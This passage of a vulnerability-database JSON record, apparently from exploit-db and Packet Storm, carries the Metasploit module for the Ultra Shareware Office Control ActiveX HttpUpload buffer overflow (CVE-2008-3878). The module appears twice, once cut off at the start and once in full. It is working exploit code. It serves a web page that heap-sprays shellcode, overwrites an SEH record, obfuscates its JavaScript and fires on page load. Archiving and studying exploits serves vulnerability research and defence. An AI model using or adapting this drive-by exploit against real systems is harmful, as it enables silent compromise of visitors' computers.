10\r\n\t\tseh_offset = 252\r\n\r\n\t\t# Build the exploit buffer\r\n\t\tsploit = rand_text_alphanumeric(seh_offset)\r\n\t\tsploit << generate_seh_record(target.ret)\r\n\r\n\t\t# Encode variables\r\n\t\tsploit = Rex::Text.to_hex(sploit, '%')\r\n\t\tshellcode = Rex::Text.to_unescape(payload.encoded, Rex::Arch.endian(target.arch))\r\n\r\n\t\t# Prepare the heap spray parameters\r\n\t\tspray_addr = target.ret\r\n\t\tspray_num = \"0x%x\" % spray_addr\r\n\r\n\t\t# Generate the final javascript\r\n\t\tjs = %Q|\r\nfunction #{fnname}()\r\n{\r\ntry {\r\nvar obj = new ActiveXObject(\"#{progid}\");\r\nvar my_unescape = unescape;\r\nvar shellcode = '#{shellcode}';\r\n#{js_heap_spray}\r\nsprayHeap(my_unescape(shellcode), #{spray_num}, 0x40000);\r\nvar arg1 = my_unescape(\"#{arg1}\");\r\nvar arg2 = my_unescape(\"#{arg2}\");\r\nvar sploit = my_unescape(\"#{sploit}\");\r\nobj.HttpUpload(arg1, arg2, sploit);\r\n} catch( e ) { window.location = 'about:blank' ; }\r\n}\r\n|\r\n\r\n\t\t# Obfuscate the javascript\r\n\t\topts = {\r\n\t\t\t'Strings' => true,\r\n\t\t\t'Symbols' => {\r\n\t\t\t\t'Variables' => %w{ obj my_unescape shellcode arg1 arg2 sploit }\r\n\t\t\t}\r\n\t\t}\r\n\t\tjs = ::Rex::Exploitation::ObfuscateJS.new(js, opts)\r\n\t\tjs.obfuscate()\r\n\r\n\t\t# Build the final HTML\r\n\t\tcontent = %Q|<html>\r\n<head>\r\n<script language=javascript>\r\n#{js}\r\n</script>\r\n</head>\r\n<body onload=\"#{fnname}()\">\r\nPlease wait...\r\n</body>\r\n</html>\r\n|\r\n\r\n\t\tprint_status(\"Sending #{self.name} to #{cli.peerhost}:#{cli.peerport}...\")\r\n\r\n\t\tsend_response_html(cli, content)\r\n\r\n\t\thandler(cli)\r\n\r\n\tend\r\n\r\nend\r\n", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://www.exploit-db.com/download/16513/"}], "packetstorm": [{"lastseen": "2016-12-05T22:17:51", "bulletinFamily": "exploit", "description": "", "modified": "2010-03-05T00:00:00", "published": "2010-03-05T00:00:00", "href": "https://packetstormsecurity.com/files/86916/Ultra-Shareware-Office-Control-ActiveX-HttpUpload-Buffer-Overflow.html", "id": "PACKETSTORM:86916", "type": "packetstorm", "title": "Ultra Shareware Office Control ActiveX HttpUpload Buffer Overflow", "sourceData": "`## \n# $Id: ultraoffice_httpupload.rb 8705 2010-03-04 06:19:37Z jduck $ \n## \n \n## \n# This file is part of the Metasploit Framework and may be subject to \n# redistribution and commercial restrictions. Please see the Metasploit \n# Framework web site for more information on licensing and terms of use. \n# http://metasploit.com/framework/ \n## \n \nrequire 'msf/core' \n \nclass Metasploit3 < Msf::Exploit::Remote \nRank = GoodRanking \n \ninclude Msf::Exploit::Remote::HttpServer::HTML \ninclude Msf::Exploit::Remote::Seh \n \ndef initialize(info = {}) \nsuper(update_info(info, \n'Name' => 'Ultra Shareware Office Control ActiveX HttpUpload Buffer Overflow', \n'Description' => %q{ \nThis module exploits a stack-based buffer overflow in Ultra Shareware's Office \nControl. When processing the 'HttpUpload' method, the arguments are concatenated \ntogether to form a command line to run a bundled version of cURL. If the command \nfails to run, a stack-based buffer overflow occurs when building the error \nmessage. This is due to the use of sprintf() without proper bounds checking. \n \nNOTE: Due to input restrictions, this exploit uses a heap-spray to get the payload \ninto memory unmodified. \n}, \n'License' => MSF_LICENSE, \n'Author' => [ 'shinnai', 'jduck' ], \n'Version' => '$Revision: 8705 $', \n'References' => \n[ \n[ 'CVE', '2008-3878' ], \n[ 'OSVDB', '47866' ], \n[ 'BID', '30861' ], \n[ 'URL', 'http://www.exploit-db.com/exploits/6318' ] \n], \n'Payload' => \n{ \n'Space' => 4096, \n'BadChars' => \"\\x00\", \n# For HttpUpload args: \"\\x80\\x82\\x83\\x84\\x85\\x86\\x87\\x88\\x89\\x8a\\x8b\\x8c\\x8e\\x91\\x92\\x93\\x94\\x95\\x96\\x97\\x98\\x99\\x9a\\x9b\\x9c\\x9e\\x9f\", \n'DisableNops' => true \n}, \n'Platform' => 'win', \n'Targets' => \n[ \n# Tested with ActiveX v2.0.0.1020 and v2.0.2008.801 \n[ 'Windows Universal', \n{ \n'Ret' => 0x0c0c0c0c # heap sprayed \n# 0x746C15A9 # p/p/r in msls31.dll \n# EEK, Safe SEH! 0x220118c2 # p/p/r in OfficeCtrl.ocx \n} \n], \n], \n'DefaultTarget' => 0)) \nend \n \ndef autofilter \nfalse \nend \n \ndef check_dependencies \nuse_zlib \nend \n \ndef on_request_uri(cli, request) \n \n# ActiveX parameters \nprogid = \"Ultra.OfficeControl\" \nclsid = \"00989888-BB72-4E31-A7C6-5F819C24D2F7\" \n \n# Set parameters \nfnname = rand_text_alpha(8+rand(8)) \narg1 = rand_text_alphanumeric(128) \narg2 = rand_text_alphanumeric(4096) * 10 \nseh_offset = 252 \n \n# Build the exploit buffer \nsploit = rand_text_alphanumeric(seh_offset) \nsploit << generate_seh_record(target.ret) \n \n# Encode variables \nsploit = Rex::Text.to_hex(sploit, '%') \nshellcode = Rex::Text.to_unescape(payload.encoded, Rex::Arch.endian(target.arch)) \n \n# Prepare the heap spray parameters \nspray_addr = target.ret \nspray_num = \"0x%x\" % spray_addr \n \n# Generate the final javascript \njs = %Q| \nfunction #{fnname}() \n{ \ntry { \nvar obj = new ActiveXObject(\"#{progid}\"); \nvar my_unescape = unescape; \nvar shellcode = '#{shellcode}'; \n#{js_heap_spray} \nsprayHeap(my_unescape(shellcode), #{spray_num}, 0x40000); \nvar arg1 = my_unescape(\"#{arg1}\"); \nvar arg2 = my_unescape(\"#{arg2}\"); \nvar sploit = my_unescape(\"#{sploit}\"); \nobj.HttpUpload(arg1, arg2, sploit); \n} catch( e ) { window.location = 'about:blank' ; } \n} \n| \n \n# Obfuscate the javascript \nopts = { \n'Strings' => true, \n'Symbols' => { \n'Variables' => %w{ obj my_unescape shellcode arg1 arg2 sploit } \n} \n} \njs = ::Rex::Exploitation::ObfuscateJS.new(js, opts) \njs.obfuscate() \n \n# Build the final HTML \ncontent = %Q|<html> \n<head> \n<script language=javascript> \n#{js} \n</script> \n</head> \n<body onload=\"#{fnname}()\"> \nPlease wait... \n</body> \n</html> \n| \n \nprint_status(\"Sending #{self.name} to #{cli.peerhost}:#{cli.peerport}...\") \n \nsend_response_html(cli, content) \n \nhandler(cli) \n \nend \n \nend \n`\n", "sourceHref": "https://packetstormsecurity.com/files/download/86916/ultraoffice_httpupload.rb.txt", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}]}
